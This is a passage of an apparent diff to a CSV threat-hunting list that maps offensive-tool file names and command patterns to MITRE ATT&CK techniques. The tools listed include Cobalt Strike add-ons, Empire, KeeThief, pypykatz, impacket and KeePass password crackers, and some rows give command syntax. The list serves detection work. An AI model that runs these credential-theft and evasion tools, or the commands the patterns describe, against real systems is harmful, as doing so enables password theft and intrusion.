kerberos*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*k4yt3x/orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*K8_CS_*.rar*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*k8gege.org/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" @@ -12623,18 +12779,18 @@ "*kali-linux-*-raspberry-pi-armhf.img.xz*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*kali-linux-*-virtualbox-amd64.ova*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*kali-linux-*-vmware-amd64.7z*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*kalitorify*","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","N/A","N/A","9","897","214","2022-05-31T08:47:52Z","2016-02-03T20:42:46Z" +"*kalitorify*","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","N/A","N/A","9","898","214","2022-05-31T08:47:52Z","2016-02-03T20:42:46Z" "*kaluche/bloodhound-quickwin*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" "*kancotdiq/wpaf*","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","51","8","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" "*karendm/ADHunt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" -"*Karmaleon.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*karmaSMB.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Karmaleon.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*karmaSMB.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*katoolin*toollist.py*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*katoolin3.py*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*KatzSystemArchitecture*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*KBDPAYLOAD.dll*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*KcpPassword.cs*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*kdcdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kdcdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*kdstab * /CHECK*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /CLOSE*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /DRIVER*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" @@ -12648,91 +12804,91 @@ "*kdstab.cna*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KeeFarceReborn.*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*KeePass.sln*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*keepass_common_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*keepass_discover.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*keepass2john *.kdbx*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*KeePassBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"*KeePassConfig.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*keepass_common_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keepass_discover.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*keepass2john *.kdbx*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*KeePassBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*KeePassConfig.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeePassConfig.ps1*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*-KeePassConfigTrigger*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-KeePassConfigTrigger*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*keepass-password-dumper*","offensive_tool_keyword","keepass-password-dumper","KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass's memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. just a memory dump","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/vdohney/keepass-password-dumper","1","1","N/A","N/A","6","567","47","2023-08-17T19:26:55Z","2023-05-01T17:08:55Z" "*KeePwn plugin add -u * -p * -d * -t *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*KeePwn plugin check -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*KeeTheft/Dinvoke*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","","N/A","","","" "*KeeThief*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - 